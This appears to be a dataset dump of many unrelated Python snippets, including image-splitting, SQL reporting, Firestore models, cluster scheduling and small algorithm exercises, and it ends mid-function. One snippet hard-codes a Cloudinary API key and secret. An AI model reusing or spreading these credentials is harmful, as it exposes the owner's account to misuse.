text stringlengths 8 6.05M |
|---|
print("julia safada")
# Libraries for Path Management and Handling Directories
import os
from os import makedirs
from os import listdir
from shutil import copyfile
from shutil import rmtree
from random import seed
from random import random

# Main Directory, adjust according to your File System Structure
os.chdir("C:/github_simba_ex2/")

# Set Seed for Generation of Random Numbers for splitting files into Training and Validation
seed(5555)

# Ratio of pictures reserved for validation.
val_ratio = 0.3
test_ratio = 0  # Not used in this implementation. Test data are manually provided in specific subdirectories

# Static Variables for Folder Structure
src_directory = 'images_all/training_small_140/'  # From which directory to take images from
# src_directory = 'images_all/training_all/'
dst_directory = 'images_model/'
categories = ['goldens', 'non_goldens', 'simba']
sub_directories = ['train', 'validation', 'test']

# Recreate the destination tree from scratch.
# fix: ignore_errors=True so the very first run (destination absent) no
# longer crashes with FileNotFoundError.
rmtree(dst_directory, ignore_errors=True)
makedirs(dst_directory)
for sub_dir in sub_directories:  # renamed from `dir` (shadowed a builtin)
    makedirs(os.path.join(dst_directory, sub_dir))
    for cat in categories:
        makedirs(os.path.join(dst_directory, sub_dir, cat))

# Copy Images for Training, Validation and Test Folder
for category in categories:
    for file_name in listdir(src_directory + category):
        src = src_directory + category + '/' + file_name
        if random() < val_ratio:
            dst = dst_directory + 'validation/' + category + '/' + file_name
        # NOTE: this draws a *second* random number; with test_ratio == 0 the
        # branch can never be taken (random() > 1), matching the original.
        elif random() > (1 - test_ratio):
            dst = dst_directory + 'test/' + category + '/' + file_name
        else:
            dst = dst_directory + 'train/' + category + '/' + file_name
        copyfile(src, dst)
|
# Reporting script for the "news" database (logs-analysis style project):
# answers three fixed questions and prints the results.
import psycopg2

conn = psycopg2.connect(database="news")
cursor = conn.cursor()

# Q1: three most-viewed articles, joining log paths to article slugs.
# SUBSTRING(log.path, 10) strips the leading '/article/' prefix — TODO confirm
# the prefix length against the actual log data.
cursor.execute('''select articles.slug, count(log.path) as a from
articles join log on SUBSTRING( log.path, 10)=articles.slug
group by articles.slug order by a desc limit 3;''')
results = cursor.fetchall()
print('1. What are the most popular three articles of all time?')
for result in results:
    print(result[0], result[1])

# Q2: view totals per author.
# NOTE(review): `articalsslug` (sic) must be a pre-created view mapping slug
# to view count — it is not defined anywhere in this script.
cursor.execute('''select authors.name, articalsslug.a from authors, articles,
articalsslug where authors.id = articles.author and
articles.slug = articalsslug.slug;''')
results = cursor.fetchall()
print('2. Who are the most popular article authors of all time?')
for result in results:
    print(result[0], result[1])

# Q3: days where the not-found percentage exceeded 1%.
# NOTE(review): `days` is presumably a view with per-day okstatus/nfstatus
# counts — verify against the database schema.
cursor.execute('''select * from (select (nfstatus/ sum( okstatus + nfstatus)
* 100) as Error, date from days group by date, nfstatus) as Error
where Error > 1;''')
results = cursor.fetchall()
print('3. On which days did more than 1% of requests lead to errors?')
for result in results:
    print(result[0], result[1])

conn.close()
|
from jBird.utils.Constants import PlayerPos
class Player(object):
    """Represents the current player: nickname, health, score and position."""

    def __init__(self, nick):
        """Create a fresh player with 2 HP, no points and the start position."""
        self.nick = nick
        self.hp = 2
        self.points = 0
        self.width = PlayerPos.START_WIDTH.value
        self.height = PlayerPos.START_HEIGHT.value

    def add_points(self, points=10):
        """Increase the player's score (default reward: 10 points)."""
        self.points = self.points + points

    def add_hp(self):
        """Grant one health point."""
        self.hp = self.hp + 1

    def sub_hp(self):
        """Remove one health point."""
        self.hp = self.hp - 1

    def did_i_lose(self):
        """Return True once health has dropped below zero."""
        return self.hp < 0
|
from celery.task import Task
from celery.registry import tasks
from celery.task import PeriodicTask
import datetime
from datetime import timedelta
from django.db.models import F
#from yoolotto.second_chance.models import ResetCoins
import celery
|
import random
import time
from tkinter import *

root = Tk()
canv = Canvas(root, width=600, height=500)
canv.pack()

# 100 random bar heights.
A = [0] * 100
for i in range(len(A)):
    A[i] = random.randint(1, 100)

# Animated selection sort (descending): after each pass the prefix A[:n+1]
# is final (drawn filled blue); the unsorted tail is drawn hollow.
for n in range(len(A)):
    m = A[n]
    # fix: initialise x to n each pass. Previously x was only assigned inside
    # the `if`, so when A[n] was already the maximum, x was stale from the
    # prior pass (undefined on the very first one), corrupting the swap.
    x = n
    for j in range(len(A) - n):
        if A[j + n] > m:
            m = A[j + n]
            x = j + n
    A[n], A[x] = m, A[n]
    canv.delete("all")
    for p in range(n + 1):
        canv.create_rectangle(p * 5 + 50, 400, p * 5 + 53, 400 - 3 * A[p], fill="blue")
    for t in range(n + 1, len(A)):
        canv.create_rectangle(t * 5 + 50, 400, t * 5 + 53, 400 - 3 * A[t])
    canv.update()
    time.sleep(0.1)

root.mainloop()
import re
def is_pangram(sentence):
    """Return True if *sentence* contains every letter of the English alphabet.

    Case-insensitive; digits, punctuation and whitespace are ignored.
    """
    # fix: the original relied on a bare `next` statement (a no-op, it meant
    # `continue`) and manual seen-letter bookkeeping; a set comparison is both
    # correct and clearer, and needs no regex.
    return set('abcdefghijklmnopqrstuvwxyz') <= set(sentence.lower())
|
#!/usr/bin/env python
# Hadoop-streaming style mapper: reads CSV rows from STDIN and emits
# tab-separated "<year>\t<third field>" pairs for a downstream reducer.
import sys

# input comes from STDIN (standard input)
for line in sys.stdin:
    # remove leading and trailing whitespace
    line = line.strip()
    # print(line)
    # split the line into words
    words = line.split(",")
    year = ''
    if len(words) == 3:
        if "-" in words[0]:
            # NOTE(review): this takes the *third* dash-separated component of
            # words[0], which is the year only for a DD-MM-YYYY layout —
            # confirm the input date format. Emission placement reconstructed;
            # the original indentation was lost.
            year = words[0].split("-")[2]
            # print(year, words[2])
            print('%s\t%s' % (year, words[2]))
|
import web
import config
import firebase_admin
import cloudinary.uploader
# Firestore handle shared by every model helper below.
db = config.db

# Cloudinary credentials used for image uploads.
# SECURITY(review): the API key/secret are hard-coded here; move them to
# environment variables or configuration and rotate the exposed secret.
cloudinary.config(
    cloud_name = "patyluprz",
    api_key = "448467956332495",
    api_secret = "iovK969N-ZReTDBMukFZp8JKrq0"
)

def insertFoto(image):
    """Upload *image* to Cloudinary; return its secure URL, or False on error."""
    try:
        result = cloudinary.uploader.upload(image)
        return result['secure_url']
    except Exception as e:
        print("error insertImage: " +str(e.args))
        return False
def insertarRestaurante(nombre, telefono, direccion, email, foto, latitud, longitud):
    """Insert a new restaurant document into the 'restaurantes' collection.

    Returns True on success, False (after printing the error) on failure.
    """
    try:
        doc_ref = db.collection(u'restaurantes').document()
        doc_ref.set({
            u'direccion': direccion,
            u'nombre': nombre,
            u'telefono': telefono,
            u'email': email,
            # fix: the dict previously listed u'foto' twice ('default.jpg'
            # then the argument); the first entry was dead code — keep only
            # the real value.
            u'foto': foto,
            u'latitud': latitud,
            u'longitud': longitud
        })
        return True
    except Exception as e:
        print("error model insertar restaurante" + str(e.args))
        return False
def insertarNegocio(nombre, telefono, direccion, email, foto, latitud, longitud):
    """Insert a new business document into the 'locales' collection.

    Returns True on success, False (after printing the error) on failure.
    """
    try:
        doc_ref = db.collection(u'locales').document()
        doc_ref.set({
            u'direccion': direccion,
            u'nombre': nombre,
            u'telefono': telefono,
            u'email': email,
            # fix: removed the duplicate u'foto' key ('default.jpg') that the
            # argument value immediately overrode.
            u'foto': foto,
            u'latitud': latitud,
            u'longitud': longitud
        })
        return True
    except Exception as e:
        print("error model insertar local" + str(e.args))
        return False
def insertarCliente(nombre, telefono, direccion, email, foto):
    """Insert a new client document into the 'clientes' collection.

    Returns True on success, False (after printing the error) on failure.
    """
    try:
        doc_ref = db.collection(u'clientes').document()
        doc_ref.set({
            u'direccion': direccion,
            u'nombre': nombre,
            u'telefono': telefono,
            u'email': email,
            # fix: removed the duplicate u'foto' key ('default.jpg') that the
            # argument value immediately overrode.
            u'foto': foto
        })
        return True
    except Exception as e:
        print("error model insertar cliente" + str(e.args))
        return False
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import cv2
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# Load the whole dirty-mnist image folder as one large grayscale batch.
train_datagen = ImageDataGenerator(
    rescale=1./255)
train_generator = train_datagen.flow_from_directory(
    '../data',
    classes=['dirty_mnist_2nd'],
    batch_size=50000,
    target_size=(64, 64),
    color_mode='grayscale',
    class_mode=None,
    shuffle=False)

# Pull the first (and only) batch out of the generator.
for i in train_generator:
    x_train = i
    break
print(x_train.shape)

# Denoise one sample: threshold, dilate, then median-blur.
img = x_train[0]
# NOTE(review): pixels were rescaled to [0, 1] above, so `img >= 255` can
# never be true and this zeroes the entire image — confirm the intent
# (the commented experiment below applies the same threshold to raw uint8).
img = np.where(img>=255, img, 0)
img = cv2.dilate(img, kernel=np.ones((2,2), np.uint8), iterations=1)
# fix: the keyword argument was misspelled `scr=`; cv2.medianBlur takes
# `src=` (see the working call in the commented block below).
img = cv2.medianBlur(src=img, ksize=5)
'''
i = 92
image_path = '../data/dirty_mnist_2nd/{:05d}.png'.format(i)
img = cv2.imread(image_path)
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = np.where(img>=255, img, 0)
_img = cv2.dilate(img, kernel=np.ones((2,2), np.uint8), iterations=1)
_img = cv2.medianBlur(src=_img, ksize=5)
# _img = cv2.bilateralFilter(_img, 10, 50, 50)
# _img = np.where(_img>=255, img, 0)
# _img = np.array(_img, dtype=np.uint8)
# denoised_img = cv2.fastNlMeansDenoising(img, None, 30, 7, 9)
print(_img.shape)
cv2.imshow('before', img)
cv2.imshow("after", _img)
cv2.waitKey(0)
cv2.destroyAllWindows()
contour, hierachy = cv2.findContours(_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
cv2.drawContours(_img, [contour[0]], 0, (0, 0, 255), 2)
cv2.imshow(_img)
cv2.destroyAllWindows()
'''
import math
class Machine:
    """A single compute node that can host at most one running job."""

    def __init__(self, id):
        self.id = id
        self.running_job_id = -1   # -1 means "no job running"
        self.is_free = True
        self.job_history = []      # ids of every job ever placed here

    def taken_by_job(self, job_id):
        """Claim the node for *job_id*; return False if it is already busy."""
        if not self.is_free:
            return False
        self.running_job_id = job_id
        self.is_free = False
        self.job_history.append(job_id)
        return True

    def release(self):
        """Free the node. Returns 1 on success, -1 if it was already free."""
        if self.is_free:
            return -1
        self.is_free = True
        self.running_job_id = -1
        return 1

    def reset(self):
        """Restore the pristine state, clearing the job history as well."""
        self.is_free = True
        self.running_job_id = -1
        self.job_history = []

    def __eq__(self, other):
        return self.id == other.id

    def __str__(self):
        return "M[" + str(self.id) + "] "
class Cluster:
    """A named pool of Machine nodes with simple first-fit allocation."""

    def __init__(self, cluster_name, node_num, num_procs_per_node):
        self.name = cluster_name
        self.total_node = node_num
        self.free_node = node_num
        self.used_node = 0
        self.num_procs_per_node = num_procs_per_node
        self.all_nodes = [Machine(i) for i in range(self.total_node)]

    def feature(self):
        """Observable state exposed to a scheduler: just the free-node count."""
        return [self.free_node]

    def can_allocated(self, job):
        """Return True if *job* fits; also fills in job.request_number_of_nodes
        (from its processor request) when it is still -1."""
        if job.request_number_of_nodes != -1:
            return job.request_number_of_nodes <= self.free_node
        needed = int(math.ceil(float(job.request_number_of_processors) / float(self.num_procs_per_node)))
        job.request_number_of_nodes = needed
        return needed <= self.free_node

    def allocate(self, job_id, request_num_procs):
        """Claim enough nodes for *request_num_procs*; return them, or [] if impossible."""
        needed = int(math.ceil(float(request_num_procs) / float(self.num_procs_per_node)))
        if needed > self.free_node:
            return []
        claimed = []
        for node in self.all_nodes:
            if len(claimed) == needed:
                return claimed
            if node.taken_by_job(job_id):
                self.used_node += 1
                self.free_node -= 1
                claimed.append(node)
        if len(claimed) == needed:
            return claimed
        # Should be unreachable: the free-node check above guaranteed capacity.
        print("Error in allocation, there are enough free resources but can not allocated!")
        return []

    def release(self, releases):
        """Return the given nodes to the free pool."""
        self.used_node -= len(releases)
        self.free_node += len(releases)
        for node in releases:
            node.release()

    def is_idle(self):
        """True when no node is in use."""
        return self.used_node == 0

    def reset(self):
        """Free every node and clear their histories."""
        self.used_node = 0
        self.free_node = self.total_node
        for node in self.all_nodes:
            node.reset()
class FakeList:
    """Stand-in for a real node list: carries only a length.

    SimpleCluster returns it from allocate() so len(...) works on the result
    without materialising Machine objects.
    """

    def __init__(self, l):
        self.len = l

    def __len__(self):
        return self.len
class SimpleCluster:
    """Bookkeeping-only variant of Cluster: tracks node counts, no Machine objects."""

    def __init__(self, cluster_name, node_num, num_procs_per_node):
        self.name = cluster_name
        self.total_node = node_num
        self.free_node = node_num
        self.used_node = 0
        self.num_procs_per_node = num_procs_per_node
        self.all_nodes = []

    def feature(self):
        """Observable state exposed to a scheduler: just the free-node count."""
        return [self.free_node]

    def can_allocated(self, job):
        """Return True if *job* fits; also fills in job.request_number_of_nodes
        (from its processor request) when it is still -1."""
        if job.request_number_of_nodes != -1:
            return job.request_number_of_nodes <= self.free_node
        needed = int(math.ceil(float(job.request_number_of_processors) / float(self.num_procs_per_node)))
        job.request_number_of_nodes = needed
        return needed <= self.free_node

    def allocate(self, job_id, request_num_procs):
        """Reserve counted capacity; return a FakeList sized to the node count,
        or [] when the request does not fit."""
        needed = int(math.ceil(float(request_num_procs) / float(self.num_procs_per_node)))
        if needed > self.free_node:
            return []
        self.used_node += needed
        self.free_node -= needed
        result = FakeList(0)
        result.len = needed
        return result

    def release(self, releases):
        """Return capacity (counted via len(releases)) to the free pool."""
        self.used_node -= len(releases)
        self.free_node += len(releases)

    def is_idle(self):
        """True when no node is in use."""
        return self.used_node == 0

    def reset(self):
        """Restore full free capacity."""
        self.used_node = 0
        self.free_node = self.total_node

# The rest of the code base uses the lightweight implementation.
Cluster = SimpleCluster
# @Title: 根据身高重建队列 (Queue Reconstruction by Height)
# @Author: 2464512446@qq.com
# @Date: 2020-11-16 11:39:35
# @Runtime: 116 ms
# @Memory: 14 MB
class Solution:
    def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:
        """Rebuild the queue from [height, k] pairs (LeetCode 406).

        Greedy: sort tallest first (ties by smaller k first), then insert each
        person at index k — everyone already placed is at least as tall, so
        each insertion keeps every k-count consistent.
        """
        if len(people) <= 1:
            return people
        ordered = sorted(people, key=lambda person: (-person[0], person[1]))
        queue = []
        for person in ordered:
            queue.insert(person[1], person)
        return queue
|
# weight value
# item1 5 60
# item2 3 50
# item3 4 70
# item4 2 30
# max_weight=5 find max value we can get!
# ans:80
# we choose item4 and item2
# 0/1 knapsack with a verbose DP trace (capacity 5, best answer 80 via
# items of weight 3 and 2).
weight = [5, 3, 4, 2]
max_weight = 5
value = [60, 50, 70, 30]
# dp_matrix[i][w] = best value using the first i items within capacity w.
dp_matrix = [[None for j in range(max_weight + 1)] for i in range(len(value) + 1)]

def print_matrix(a):
    """Dump the DP table, one row per line (None marks unfilled cells)."""
    for row in a:
        for cell in row:
            print(cell, end=" ")
        print()

for i in range(len(dp_matrix)):
    for w in range(len(dp_matrix[0])):
        if w == 0 or i == 0:
            # Base row/column: zero items or zero capacity is worth nothing.
            print("i==0 or w==0")
            dp_matrix[i][w] = 0
            print_matrix(dp_matrix)
        elif weight[i - 1] <= w:
            # Item i-1 fits: take the better of skipping it or taking it.
            print("{}<={}".format(weight[i - 1], w))
            dp_matrix[i][w] = max(dp_matrix[i - 1][w],
                                  dp_matrix[i - 1][w - weight[i - 1]] + value[i - 1])
            print_matrix(dp_matrix)
        else:
            # Item i-1 is too heavy for capacity w.
            print("else")
            dp_matrix[i][w] = dp_matrix[i - 1][w]
            print_matrix(dp_matrix)

print("ans:" + str(dp_matrix[len(value)][max_weight]))
|
class Room:
    """A room with an owner and dimensions; demonstrates the property,
    classmethod and staticmethod decorators."""

    tag = 1  # class-level attribute shown by tell_info()

    def __init__(self, name, owner, width, length, height):
        self.name = name
        self.owner = owner
        self.width = width
        self.length = length
        self.height = height

    @property
    def mianji(self):
        """Floor area (width * length), exposed as a read-only attribute."""
        return self.width * self.length

    @property
    def tiji(self):
        """Volume (width * length * height), exposed as a read-only attribute."""
        return self.width * self.length * self.height

    @classmethod
    def tell_info(cls):
        """Class-method demo: prints the class-level tag."""
        print("这是个类方法---", cls.tag)

    @staticmethod
    def wash_room(a, b):
        """Static-method demo: a utility that needs no instance state."""
        print("%s和%s在清洗房间" % (a, b))

    def test(x, y):
        """Plain function in the class body: only sensible via Room.test(...)."""
        print("%s和%s在吃房间" % (x, y))
# Demo driver: build a Room and exercise its properties and method kinds.
r1 = Room('别墅','吉泽',100,100,100)
res = r1.mianji  # property access, no call parentheses
print(res)
print("%s 住的 %s 总面积是%s:" %(r1.owner,r1.name,r1.mianji))
print(r1.tiji)
Room.tell_info()
r1.wash_room('高渐离','阿珂')  # static methods may be called on instances too
Room.wash_room("公孙离",'后裔')
Room.test('2','3') |
# Generated by Django 3.0.3 on 2020-02-29 15:34
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration: creates the Propertyclassifications
    table (symbol + category) for the njrealestate app."""

    dependencies = [
        ('njrealestate', '0004_auto_20200229_1514'),
    ]

    operations = [
        migrations.CreateModel(
            name='Propertyclassifications',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=3)),
                ('category', models.CharField(max_length=60)),
            ],
        ),
    ]
|
# Print the first `termo` terms of the Fibonacci sequence, arrow-separated.
print('_'*30)
print('\nSequência de Fibonacci')
print('_'*30)
termo = int(input('Digite quantos termos você quer mostrar: '))
t1 = 0
t2 = 1
print(f'{t1} ➞ {t2}', end=' ')
cont = 3  # the first two terms are already printed
while cont <= termo:
    t3 = t1 + t2
    print(f'➞ {t3}', end=' ')
    t1 = t2
    t2 = t3
    # fix: removed a redundant `t3 = t1 + t2` here — the value was recomputed
    # at the top of the loop anyway and never used in between.
    cont += 1
# Odoo addon manifest for the "Advanced Pivot Table" web extension.
{
    'name': 'Advanced Pivot Table',
    'version': '8.0.0.1',
    'author': 'Geo Technosoft',
    'sequence':'10',
    'category': 'Hidden',
    'website': 'https://www.geotechnosoft.com',
    'summary': 'Custom Pivot Table',
    'description': """
This module will add new features pivot table like click on td.
Example to pass context in action
{'ctx_module_name': 'account',
'ctx_view_xml_id': 'view_move_line_tree',
'ctx_view_form_xml_id': 'view_move_line_form'}
""",
    'depends': ['web'],
    'data': ['views/webclient_templates.xml'],
    'qweb': ['static/src/xml/*.xml'],
    'test': [],
    'demo': [],
    'installable': True,
    'application': True,
    # NOTE(review): auto_install True installs this module automatically
    # whenever its dependencies are present — confirm that is intended.
    'auto_install': True,
}
|
'''
Usos comuns:
-Redes
-Requisições
-Abrir ou fechar arquivos
'''
# Minimal try/except demo: opening a file that (probably) does not exist.
try:
    # NOTE(review): the handle would leak if "Alou" actually existed — real
    # code should use `with open(...)`.
    open("Alou")
except Exception as erro:
    print("Erro capturado:", erro, "\n")
    print("Arruma aê bocó")
# OpenERP 7 addon manifest: Econube's Chilean-style invoice reports.
{
    "name" : "econube_report",
    "version" : "7.0",
    "author" : "Econube | pablo cabezas",
    "category" : "reportes account",
    "description" : "reportes facturas tipo chilean",
    "init_xml" : [],
    "update_xml" : [
        'eco_report.xml',
    ],
    "depends" : ['base','account'],
    "active" : False,
    "installable" : True,
}
#!/usr/bin/env python
"""
_SetLocation_
MySQL implementation of Files.SetLocation
"""
from WMCore.Database.DBFormatter import DBFormatter
class SetLocation(DBFormatter):
    """MySQL implementation of Files.SetLocation.

    Associates WMBS files with storage locations, resolving each PNN string
    to its wmbs_location id via wmbs_location_pnns.
    """

    sql = """INSERT INTO wmbs_file_location (fileid, location)
SELECT :fileid, wmbs_location.id FROM wmbs_location
INNER JOIN wmbs_location_pnns wls ON wls.location = wmbs_location.id
WHERE wls.pnn = :location"""

    def getBinds(self, file = None, location = None):
        """Build bind dictionaries pairing every file with every location.

        *location* may be a single PNN string or a list/set of them; any other
        type raises Exception.
        """
        # fix: idiomatic isinstance() instead of `type(location) == type('string')`
        # (which also rejected str subclasses).
        if isinstance(location, str):
            return self.dbi.buildbinds(self.dbi.makelist(file), 'fileid',
                                       self.dbi.buildbinds(self.dbi.makelist(location), 'location'))
        elif isinstance(location, (list, set)):
            binds = []
            for l in location:
                binds.extend(self.dbi.buildbinds(self.dbi.makelist(file), 'fileid',
                                                 self.dbi.buildbinds(self.dbi.makelist(l), 'location')))
            return binds
        else:
            raise Exception("Type of location argument is not allowed: %s" \
                            % type(location))

    def execute(self, file, location, conn = None, transaction = None):
        """Run the insert for the computed binds; returns nothing."""
        binds = self.getBinds(file, location)
        # fix: dropped the unused `result` local — the call is made for its
        # side effect only.
        self.dbi.processData(self.sql, binds, conn = conn,
                             transaction = transaction)
        return
|
... the content of the __init__.py file.
... the definitions in __init__.py tell other
... python files how the code hierarchy is organized.
your_package/
__init__.py
file1.py
file2.py
...
fileN.py
# in __init__.py
from .file1 import *
from .file2 import *
...
from .fileN import *
# in file1.py
def add():
pass
... then others can call add() by
from your_package import add
... without knowing file1's inside functions, like
from your_package.file1 import add
|
from xmind.core.markerref import MarkerRefsElement
from xmind.core.const import TAG_MARKERREFS
from xmind.tests import logging_configuration as lc
from xmind.tests import base
from unittest.mock import patch
class MarkerRefsElementTest(base.Base):
    """Unit tests for xmind.core.markerref.MarkerRefsElement construction."""

    def getLogger(self):
        # Lazily create and cache one logger per test-class instance.
        if not getattr(self, '_logger', None):
            self._logger = lc.get_logger('MarkerRefsElementTest')
        return self._logger

    def test_init_without_parameters(self):
        """test that object of the class could be created with different number of parameters and it has correct static attribute"""
        # Patch the mixin base __init__ so no real DOM node/workbook is
        # needed; each construction only checks the forwarded arguments.
        with patch('xmind.core.mixin.WorkbookMixinElement.__init__') as WorkbookMixinElementMock:
            _test_object = MarkerRefsElement()
            WorkbookMixinElementMock.assert_called_with(None, None)
            MarkerRefsElement('test')
            WorkbookMixinElementMock.assert_called_with('test', None)
            MarkerRefsElement('test', 2)
            WorkbookMixinElementMock.assert_called_with('test', 2)
            MarkerRefsElement(node=None, ownerWorkbook=3)
            WorkbookMixinElementMock.assert_called_with(None, 3)
            # A third positional argument is not part of the signature.
            with self.assertRaises(Exception):
                MarkerRefsElement('test', 2, 4)
            # The failed call above must not have reached the mixin __init__.
            self.assertEqual(WorkbookMixinElementMock.call_count, 4)
            self.assertEqual(_test_object.TAG_NAME, TAG_MARKERREFS)
|
import pickle
def save_to_pickle(variable, filename):
    """Serialise *variable* to *filename* with pickle (binary mode)."""
    with open(filename, 'wb') as sink:
        pickle.dump(variable, sink)
def open_pickle(path_to_file):
    """Load and return the pickled object stored at *path_to_file*."""
    with open(path_to_file, 'rb') as source:
        return pickle.load(source)
class Caching:
    """Mixin-style helper that pickles a fixed set of attributes to ./data."""

    def __init__(self):
        # Names of the attributes that cache_data() snapshots.
        self.access_list = [
            'account_data',
            'master_table',
            'team_list',
            'team_info',
            'player_price_data',
            'player_stats_data',
            'player_top_50_data',
            'team_ids',
            'username_hash',
        ]

    @staticmethod
    def get_cached_data(fname):
        """Load a previously cached snapshot from ./data/<fname>.pickle."""
        return open_pickle('./data/' + fname + '.pickle')

    def cache_data(self, fname):
        """Snapshot every attribute in access_list to ./data/<fname>.pickle."""
        snapshot = {name: getattr(self, name) for name in self.access_list}
        save_to_pickle(snapshot, './data/' + fname + '.pickle')
# add path to the src and test directory
import os
import sys
# Resolve the project root from the environment and extend sys.path so the
# algorithm sources, tests and example models import directly by name.
PARENT_PATH = os.getenv('PYMCTS_ROOT')
# NOTE(review): if PYMCTS_ROOT is unset PARENT_PATH is None and the
# concatenations below raise TypeError; the value is also assumed to end
# with a trailing slash — verify both.
SRC_PATH = PARENT_PATH +"src/"
TEST_PATH = PARENT_PATH +"test/"
sys.path.append(SRC_PATH+"algorithm")
sys.path.append(TEST_PATH)
sys.path.append(PARENT_PATH+"performance/accuracy/testset")
sys.path.append(PARENT_PATH+"performance/strength")
sys.path.append(SRC_PATH+"examples/connectfour/")
from unittest import TestCase
from nose.tools import *
import pdb
import mcts
import connectfour_model
import heuristic_model
import game_simulator
def test_game():
    """Play one full MCTS-vs-heuristic Connect Four game and sanity-check the result."""
    mc1 = mcts.MCTS()
    mc2 = mcts.MCTS()
    model1 = connectfour_model.ConnectFour()
    model2 = heuristic_model.ConnectFour()
    T = game_simulator.GameSimulator()
    res = T.play(mc1,model1,mc2,model2)
    # NOTE(review): assumed 0 = draw, 1/2 = winning player — confirm against
    # GameSimulator.play.
    ok_(res in [0,1,2])
|
# 🚨 Don't change the code below 👇
print("Welcome to the Love Calculator!")
name1 = input("What is your name? \n")
name2 = input("What is their name? \n")
# 🚨 Don't change the code above 👆
#Write your code below this line 👇
# Score = occurrences of the letters of "true" plus those of "love" across
# both (lowercased) names.
name1_lower = name1.lower()
name2_lower = name2.lower()
combined = name1_lower + name2_lower

# fix: the original repeated the same count-and-add pattern once per letter
# (and counted "e" twice in separate variables); summing the counts over each
# word's letters is equivalent and removes the duplication.
first_digit = sum(combined.count(letter) for letter in "true")
second_digit = sum(combined.count(letter) for letter in "love")
lovescore = (first_digit + second_digit)

if lovescore < 10 or lovescore > 90:
    print("your score is ",lovescore,"you go together like coke and mentos")
elif lovescore > 40 and lovescore < 50:
    print("your score is",lovescore,"you are alright together")
else:
    print("your score is",lovescore)
from django.apps import AppConfig
class SpinnerConfig(AppConfig):
    """Django application configuration for the `spinner` app."""
    name = 'spinner'
|
import time
from datetime import datetime
from features.feature import Feature
from field import Field
from numbersforwatch import Number
from painter import RGB_Field_Painter, Led_Matrix_Painter
class Clock(Feature):
    """Feature that renders the current time on the LED field and the
    current date on the LED matrix."""

    def __init__(self, field_leds: Field, field_matrix: Field, rgb_field_painter: RGB_Field_Painter,
                 led_matrix_painter: Led_Matrix_Painter):
        """Forward all drawing surfaces/painters to the Feature base class."""
        super(Clock, self).__init__(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)

    @staticmethod
    def __leading_zeros(number: int) -> str:
        """Format *number* as exactly two characters, zero-padded on the left."""
        return str(number).zfill(2)[-2:]

    def get_time(self):
        """Return the current local (hour, minute, second)."""
        now = datetime.today()
        return now.hour, now.minute, now.second

    def get_date(self):
        """Return the current local (year, month, day)."""
        today = datetime.today()
        return today.year, today.month, today.day

    def draw_clock(self, color: list = None):
        """Render HH MM SS as six digit blocks onto the LED field."""
        self.field_leds.set_all_pixels_to_black()
        hour, minute, second = self.get_time()
        digits = []
        for part in (hour, minute, second):
            text = self.__leading_zeros(part)
            digits.append(int(text[0]))
            digits.append(int(text[1]))
        # Fixed anchor (x, y) for each of the six digit positions.
        anchors = [[0, 1], [5, 1], [0, 7], [5, 7], [0, 13], [5, 13]]
        for digit, anchor in zip(digits, anchors):
            self.field_leds.set_block(Number(digit).block, anchor[0], anchor[1], color)

    def get_date_string(self):
        """Clear the matrix field and return the date formatted as 'DD.MM.'."""
        self.field_matrix.set_all_pixels_to_black()
        _, month, day = self.get_date()
        return self.__leading_zeros(day) + "." + self.__leading_zeros(month) + "."

    def event(self, eventname: str):
        """The clock ignores external events."""
        pass

    def tick(self):
        """Redraw time and date, then idle briefly."""
        self.draw_clock()
        self.rgb_field_painter.draw(self.field_leds)
        self.led_matrix_painter.show_Text(self.get_date_string())
        time.sleep(0.05)

    def start(self, playername: str = None):
        """Blank both fields before the clock starts ticking."""
        self.field_leds.set_all_pixels_to_black()
        self.field_matrix.set_all_pixels_to_black()
        self.rgb_field_painter.draw(self.field_leds)
        self.led_matrix_painter.draw(self.field_matrix)

    def stop(self):
        pass

    def is_game_over(self):
        """A clock never ends."""
        return False
|
#import sys
#input = sys.stdin.readline
def prime_factor(N):
    """Return the smallest prime factor of N, or N itself if N is prime.

    Trial division up to sqrt(N).
    """
    # fix: dropped the unused `ret = 0` local from the original.
    middle = int(N**(1/2))
    for i in range(2, middle + 1):
        if N % i == 0:
            return i
    return N
def factors(N):
    """Return every divisor of N as a deque (order unspecified)."""
    from collections import deque
    divisors = deque()
    middle = int(N**(1/2))
    # Each divisor below sqrt(N) pairs with one above it.
    for candidate in range(1, middle):
        if N % candidate == 0:
            divisors.append(candidate)
            divisors.append(N // candidate)
    # Handle the boundary around sqrt(N) separately so a perfect square
    # contributes its root only once.
    if N % middle == 0:
        divisors.append(middle)
        if middle != N // middle:
            divisors.append(N // middle)
    return divisors
def solve(N, p):
ANS = []
q = N//p
for i in range(p):
ans = [q]
t = N*(N-1)//2//p
for j in range(q-1):
num = j*p+(j+i)%p
t -= num
ans.append(num*2+1)
if t < 0:
return []
ans.append(t*2+1)
ANS.append(ans)
return ANS
def solve2(N, p):
    """Special case p == 2: print q, then q triples [2, odd, mirrored odd].

    Prints the full answer directly and returns None.
    """
    q = N // p
    rows = []
    print(q)
    for i in range(q):
        rows.append([2, i * 2 + 1, N * 2 - 1 - i * 2])
    print("\n".join([" ".join(map(str, row)) for row in rows]))
    return
def main():
    """Read N from stdin and print a partition built from a non-trivial
    divisor of N, or 'impossible' when none works."""
    # for i in range(2, 10):
    #     print(i, prime_factor(i))
    N = int(input())
    # p = prime_factor(N)
    # if p == N:
    #     print("impossible")
    #     return
    ANS = []
    for p in factors(N):
        # Trivial divisors cannot split N into more than one equal group.
        if p == 1 or p == N:
            continue
        if p == 2:
            # p == 2 has a dedicated constructive solution that prints and exits.
            solve2(N, p)
            return
        ANS = solve(N, p)
        if ANS:
            print(N // p)
            break
        # (earlier hand-rolled variants kept by the author)
        # if p == 2:
        #     print(q)
        #     for i in range(q):
        #         ans = [2, i*2+1, N*2-1-i*2]
        #         ANS.append(ans)
        #     print("\n".join([" ".join(map(str, ans)) for ans in ANS]))
        #     return
        # print(q)
        # for i in range(p):
        #     ans = [q]
        #     t = N*(N-1)//2//p
        #     for j in range(q-1):
        #         num = j*p+(j+p//2+1+i)%p
        #         t -= num
        #         ans.append(num*2+1)
        #     ans.append(t*2+1)
        #     ANS.append(ans)
    if ANS:
